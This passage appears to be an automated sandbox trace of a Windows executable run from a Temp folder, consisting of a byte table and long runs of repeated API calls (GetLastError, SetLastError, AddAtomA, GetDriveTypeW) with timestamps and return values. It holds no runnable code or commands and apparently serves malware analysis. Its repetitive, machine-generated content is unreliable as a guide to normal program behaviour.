\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa9\x29\x8d\x86\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0115.694] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.700] SetLastError (dwErrCode=0x0) [0115.700] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.701] SetLastError (dwErrCode=0x0) [0115.701] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.702] SetLastError (dwErrCode=0x0) [0115.702] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.703] GetLastError () returned 0x0 [0115.703] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.704] SetLastError (dwErrCode=0x0) [0115.704] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.705] SetLastError (dwErrCode=0x0) [0115.705] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.706] SetLastError (dwErrCode=0x0) [0115.706] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.707] SetLastError (dwErrCode=0x0) [0115.707] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.708] GetLastError () returned 0x0 [0115.708] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.709] SetLastError (dwErrCode=0x0) [0115.709] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.710] GetLastError () returned 0x0 [0115.710] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.711] SetLastError (dwErrCode=0x0) [0115.711] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.712] GetLastError () returned 0x0 [0115.712] SetLastError (dwErrCode=0x0) [0115.713] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0115.713] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.714] AddAtomA (lpString=0x0) returned 0x0 [0115.714] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.765] AddAtomA (lpString=0x0) returned 0x0 [0115.765] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.766] AddAtomA (lpString=0x0) returned 0x0 [0115.766] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.767] AddAtomA (lpString=0x0) returned 0x0 [0115.767] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 [0115.768] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.768] AddAtomA (lpString=0x0) returned 0x0 